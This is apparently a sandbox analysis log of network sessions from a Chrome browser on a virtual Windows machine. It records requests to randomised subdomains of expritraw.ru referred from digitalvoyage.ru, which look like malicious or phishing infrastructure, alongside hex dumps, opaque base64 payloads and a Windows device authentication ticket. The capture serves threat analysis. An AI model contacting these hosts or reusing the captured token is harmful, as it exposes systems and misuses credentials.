                                                                                  2025-01-07 18:49:19 UTC1369INData Raw: 52 55 53 4d 66 34 2f 41 51 4d 75 4d 7a 49 39 48 45 4d 49 50 44 59 6c 43 30 6b 79 45 45 68 47 4a 79 31 53 53 43 73 78 44 6c 49 61 57 7a 4e 64 57 6c 52 63 57 6a 68 6e 57 43 5a 6d 56 79 74 6c 4b 6b 31 62 5a 79 52 6a 56 54 46 49 54 54 64 31 54 6b 5a 78 4f 56 46 76 56 6e 42 55 64 45 39 32 62 6c 35 37 65 47 42 38 67 56 56 32 6a 30 35 4f 54 33 46 6a 6a 46 4a 52 59 31 5a 73 6c 49 39 5a 66 31 6c 72 58 6f 4a 61 62 5a 75 64 68 58 32 6e 6f 49 61 65 71 71 57 72 5a 71 69 65 62 4b 61 6d 6c 71 53 79 73 70 71 56 64 62 43 66 74 37 61 35 75 4b 47 34 77 73 43 65 77 4c 2b 79 76 34 58 46 75 4a 75 5a 7a 49 36 78 73 63 79 55 69 5a 62 49 6a 4d 2b 37 31 63 62 62 32 64 44 4f 31 2b 44 61 6d 4f 4f 38 32 4b 6a 72 77 61 72 6c 31 39 7a 67 37 71 71 39 36 62 50 72 36 75 6a 62 2b 2b 54 74
                                                                                  Data Ascii: RUSMf4/AQMuMzI9HEMIPDYlC0kyEEhGJy1SSCsxDlIaWzNdWlRcWjhnWCZmVytlKk1bZyRjVTFITTd1TkZxOVFvVnBUdE92bl57eGB8gVV2j05OT3FjjFJRY1ZslI9Zf1lrXoJabZudhX2noIaeqqWrZqiebKamlqSyspqVdbCft7a5uKG4wsCewL+yv4XFuJuZzI6xscyUiZbIjM+71cbb2dDO1+DamOO82Kjrwarl19zg7qq96bPr6ujb++Tt
                                                                                  2025-01-07 18:49:19 UTC1369INData Raw: 59 34 2f 44 41 69 49 54 59 71 4a 30 51 70 52 44 4a 43 49 46 4d 39 44 31 5a 56 52 44 67 30 55 45 59 73 55 68 31 43 50 42 74 64 54 7a 52 61 59 6c 49 34 53 47 68 4f 4a 30 31 62 57 32 6b 37 53 58 56 48 59 7a 4e 76 55 6c 4e 79 63 46 6c 6e 63 6c 46 33 51 6d 46 4f 58 6b 4a 69 57 6f 6c 72 59 32 4e 6d 54 6d 4a 62 61 6f 31 38 61 4a 53 4f 65 48 4a 51 6b 6f 71 4b 55 4a 31 30 6b 31 70 30 59 58 43 45 70 6d 53 52 6e 35 39 32 6c 58 68 74 66 61 6d 63 62 61 56 74 64 70 61 51 63 59 39 31 6b 48 65 59 6d 35 4a 39 6f 59 43 32 6a 35 56 39 79 5a 69 6e 72 4b 53 57 71 4d 4b 73 70 4b 79 4f 76 61 7a 48 71 35 47 6d 70 38 33 56 71 73 7a 5a 33 4b 79 73 76 37 69 76 35 39 6d 30 74 62 66 68 7a 62 6e 65 79 38 2b 2f 7a 4f 37 63 78 2b 66 58 71 74 62 58 74 75 6e 4a 79 64 54 6f 79 72 72 39 77
                                                                                  Data Ascii: Y4/DAiITYqJ0QpRDJCIFM9D1ZVRDg0UEYsUh1CPBtdTzRaYlI4SGhOJ01bW2k7SXVHYzNvUlNycFlnclF3QmFOXkJiWolrY2NmTmJbao18aJSOeHJQkoqKUJ10k1p0YXCEpmSRn592lXhtfamcbaVtdpaQcY91kHeYm5J9oYC2j5V9yZinrKSWqMKspKyOvazHq5Gmp83VqszZ3Kysv7iv59m0tbfhzbney8+/zO7cx+fXqtbXtunJydToyrr9w
                                                                                  2025-01-07 18:49:19 UTC625INData Raw: 34 48 67 59 4b 4a 43 55 62 51 53 38 68 56 7a 64 4e 4c 55 73 6e 4f 79 67 35 57 56 55 34 59 6b 30 65 50 54 39 41 56 44 74 61 51 30 4d 32 62 6c 6c 47 50 69 70 6c 54 6b 64 6b 59 53 35 57 61 6d 6c 38 52 6e 34 32 55 31 6c 62 66 54 39 5a 55 55 5a 45 56 56 53 4a 61 46 6c 46 58 48 68 69 6b 32 4e 4c 61 35 52 57 65 48 61 5a 57 6d 35 70 65 49 35 2f 66 36 4b 4f 68 48 68 75 67 33 39 2f 63 32 71 55 66 6d 61 64 62 49 43 77 6f 70 57 4b 66 71 56 75 67 72 71 70 69 34 2b 59 74 5a 36 4c 6e 5a 65 38 70 4d 66 46 6d 5a 75 6b 69 6f 65 5a 7a 37 6e 49 6d 39 48 52 6b 5a 37 58 72 38 47 69 74 61 66 63 75 38 2b 76 32 4b 75 38 30 61 43 76 31 72 2f 62 76 4c 61 33 71 4c 36 6d 74 37 33 50 38 36 2f 67 77 62 2f 31 74 63 7a 71 73 73 7a 61 37 4f 33 53 31 63 33 6a 32 75 51 49 38 62 37 6c 44 4f
                                                                                  Data Ascii: 4HgYKJCUbQS8hVzdNLUsnOyg5WVU4Yk0ePT9AVDtaQ0M2bllGPiplTkdkYS5Waml8Rn42U1lbfT9ZUUZEVVSJaFlFXHhik2NLa5RWeHaZWm5peI5/f6KOhHhug39/c2qUfmadbICwopWKfqVugrqpi4+YtZ6LnZe8pMfFmZukioeZz7nIm9HRkZ7Xr8Gitafcu8+v2Ku80aCv1r/bvLa3qL6mt73P86/gwb/1tczqssza7O3S1c3j2uQI8b7lDO


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  30192.168.2.649860104.18.94.414436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:19 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/2126003918:1736274592:yhHrOMcq_yWVDdXkB-uSkPp0ozwhPwfQV3b4Q4T8_y4/8fe6202638555e78/b.m.fsd2Rbe6MMJrUqvVhKuNQiNdicvfSU7g3CyBe5Y-1736275743-1.1.1.1-UpjN468qQSLsm5ZjAEnXayNCiOtSagLrG.JkdhMYYDDWRSzdyKgyRB4Xb2RdeasX HTTP/1.1
                                                                                  Host: challenges.cloudflare.com
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:19 UTC379INHTTP/1.1 404 Not Found
                                                                                  Date: Tue, 07 Jan 2025 18:49:19 GMT
                                                                                  Content-Type: application/json
                                                                                  Content-Length: 7
                                                                                  Connection: close
                                                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                  cf-chl-out: WYh0gdoJqXl0LgyhlUwTuoQ8qEQY37lLdLA=$8XBpsP0pbSyn5CFD
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6208b4e2e41c6-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  2025-01-07 18:49:19 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                  Data Ascii: invalid


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  31192.168.2.649867188.114.96.34436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:20 UTC687OUTGET /tptlykbbjyrpxzwekcoUjUvVlZQLDEXIGMPVUGOILAXMMANLVDNEEIONYXUKFUINWCZJYGPCVWQ HTTP/1.1
                                                                                  Host: nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru
                                                                                  Connection: keep-alive
                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                  sec-ch-ua-mobile: ?0
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  sec-ch-ua-platform: "Windows"
                                                                                  Accept: */*
                                                                                  Origin: https://7x8x.digitalvoyage.ru
                                                                                  Sec-Fetch-Site: cross-site
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Referer: https://7x8x.digitalvoyage.ru/
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:20 UTC904INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WXcr5iG092rhQBbm0p4sMTnYMQfRoxECasdUe5UWlFzIe0dhQgmSR3EIEWfCv5So5Isk4sLjz%2FMPA16eESvUXo%2FEeuolp%2ByLyYI7lF1sxnTOQ9jSOyHor7JMh5zix7u86qUIbiO2%2FDX4ebBK0%2BCZEVmJhdhHVk80IutCvDsCfVMgknExCO8zP1uk6Uv2QMf%2BENpduQW0%2BSS2ZhM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe6208e9ac68c51-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2004&min_rtt=1997&rtt_var=754&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1265&delivery_rate=1462193&cwnd=234&unsent_bytes=0&cid=8785aee96719f859&ts=553&x=0"
                                                                                  2025-01-07 18:49:20 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                  Data Ascii: 11
                                                                                  2025-01-07 18:49:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  32192.168.2.649881188.114.97.34436872C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:22 UTC471OUTGET /tptlykbbjyrpxzwekcoUjUvVlZQLDEXIGMPVUGOILAXMMANLVDNEEIONYXUKFUINWCZJYGPCVWQ HTTP/1.1
                                                                                  Host: nrghswqujii9u953lt6vji9kd6xexuj3autugc7kuuwisdl5vycxdguirpd.expritraw.ru
                                                                                  Connection: keep-alive
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                  Accept: */*
                                                                                  Sec-Fetch-Site: none
                                                                                  Sec-Fetch-Mode: cors
                                                                                  Sec-Fetch-Dest: empty
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  2025-01-07 18:49:22 UTC902INHTTP/1.1 200 OK
                                                                                  Date: Tue, 07 Jan 2025 18:49:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Access-Control-Allow-Origin: *
                                                                                  cf-cache-status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jlTO1%2FySBLDJ95ND4jRcoTHBzOFp9W7m4I8STHgJiFPcE9j1uxbn8Y2gwATJ22KZYfEGI4iFR3TQ3PnWBcgXNsqgtYBepTLAEp%2FIYYyzHIht9%2FdTwtuikiAr1iTQASdKfCzrmrqp90BKENOQy8XP2y%2F2PlNQm6P16ccahTZ%2Bgy7mxvNPTw9i4%2BCVUjuqCDGN6oa8OBOnmtjeraU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8fe620995fdff791-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1506&min_rtt=1500&rtt_var=574&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1049&delivery_rate=1886304&cwnd=158&unsent_bytes=0&cid=371156a6f3d79ad6&ts=589&x=0"
                                                                                  2025-01-07 18:49:22 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                  Data Ascii: 11
                                                                                  2025-01-07 18:49:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  33192.168.2.64990940.113.103.199443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:25 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 48 55 35 43 39 34 36 52 57 6b 53 71 51 6f 4f 44 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 61 30 32 39 61 32 32 34 33 61 36 64 35 65 39 0d 0a 0d 0a
                                                                                  Data Ascii: CNT 1 CON 305MS-CV: HU5C946RWkSqQoOD.1Context: 7a029a2243a6d5e9
                                                                                  2025-01-07 18:49:25 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                  2025-01-07 18:49:25 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 48 55 35 43 39 34 36 52 57 6b 53 71 51 6f 4f 44 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 61 30 32 39 61 32 32 34 33 61 36 64 35 65 39 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41
                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: HU5C946RWkSqQoOD.2Context: 7a029a2243a6d5e9<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
                                                                                  2025-01-07 18:49:25 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 48 55 35 43 39 34 36 52 57 6b 53 71 51 6f 4f 44 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 61 30 32 39 61 32 32 34 33 61 36 64 35 65 39 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: HU5C946RWkSqQoOD.3Context: 7a029a2243a6d5e9<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                  2025-01-07 18:49:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                  Data Ascii: 202 1 CON 58
                                                                                  2025-01-07 18:49:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 62 58 68 6c 74 63 59 6a 53 55 47 76 56 65 71 45 34 39 2f 61 38 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                  Data Ascii: MS-CV: bXhltcYjSUGvVeqE49/a8w.0Payload parsing failed.


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  34192.168.2.65008540.113.110.67443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:49:56 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 32 6b 41 76 58 43 38 76 6c 55 65 6a 45 66 31 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 35 36 37 63 66 66 63 62 63 33 30 30 64 62 66 0d 0a 0d 0a
                                                                                  Data Ascii: CNT 1 CON 305MS-CV: 2kAvXC8vlUejEf1c.1Context: a567cffcbc300dbf
                                                                                  2025-01-07 18:49:56 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                  2025-01-07 18:49:56 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 32 6b 41 76 58 43 38 76 6c 55 65 6a 45 66 31 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 35 36 37 63 66 66 63 62 63 33 30 30 64 62 66 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41
                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 2kAvXC8vlUejEf1c.2Context: a567cffcbc300dbf<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
                                                                                  2025-01-07 18:49:56 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 32 6b 41 76 58 43 38 76 6c 55 65 6a 45 66 31 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 35 36 37 63 66 66 63 62 63 33 30 30 64 62 66 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: 2kAvXC8vlUejEf1c.3Context: a567cffcbc300dbf<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                  2025-01-07 18:49:56 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                  Data Ascii: 202 1 CON 58
                                                                                  2025-01-07 18:49:56 UTC58INData Raw: 4d 53 2d 43 56 3a 20 57 42 32 50 64 74 71 70 4e 6b 2b 4d 4d 58 57 69 64 2b 4a 32 4e 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                  Data Ascii: MS-CV: WB2PdtqpNk+MMXWid+J2NA.0Payload parsing failed.


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  35192.168.2.65009240.113.110.67443
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-07 18:50:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 39 73 6a 6d 78 79 6e 4c 77 55 75 35 68 6c 43 33 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 38 62 33 33 36 32 66 34 66 33 35 65 61 38 65 0d 0a 0d 0a
                                                                                  Data Ascii: CNT 1 CON 305MS-CV: 9sjmxynLwUu5hlC3.1Context: c8b3362f4f35ea8e
                                                                                  2025-01-07 18:50:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                  2025-01-07 18:50:29 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 39 73 6a 6d 78 79 6e 4c 77 55 75 35 68 6c 43 33 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 38 62 33 33 36 32 66 34 66 33 35 65 61 38 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 37 33 70 6a 43 66 4b 2b 45 44 33 4f 55 4a 65 76 57 5a 50 33 6b 37 65 72 61 71 6e 67 6e 56 55 76 57 47 6e 58 4c 2b 74 6e 6a 4c 34 68 74 79 74 41 30 30 49 46 33 57 71 71 74 32 50 50 53 68 41 54 31 32 6c 6b 64 61 4b 6a 49 34 54 35 51 6c 33 72 41 53 79 51 6c 72 36 6b 34 49 35 6d 32 64 71 57 6c 63 4b 50 4e 75 67 68 50 65 47 41
                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: 9sjmxynLwUu5hlC3.2Context: c8b3362f4f35ea8e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe73pjCfK+ED3OUJevWZP3k7eraqngnVUvWGnXL+tnjL4htytA00IF3Wqqt2PPShAT12lkdaKjI4T5Ql3rASyQlr6k4I5m2dqWlcKPNughPeGA
                                                                                  2025-01-07 18:50:29 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 39 73 6a 6d 78 79 6e 4c 77 55 75 35 68 6c 43 33 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 38 62 33 33 36 32 66 34 66 33 35 65 61 38 65 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                  Data Ascii: BND 3 CON\WNS 0 197MS-CV: 9sjmxynLwUu5hlC3.3Context: c8b3362f4f35ea8e<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                  2025-01-07 18:50:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                  Data Ascii: 202 1 CON 58
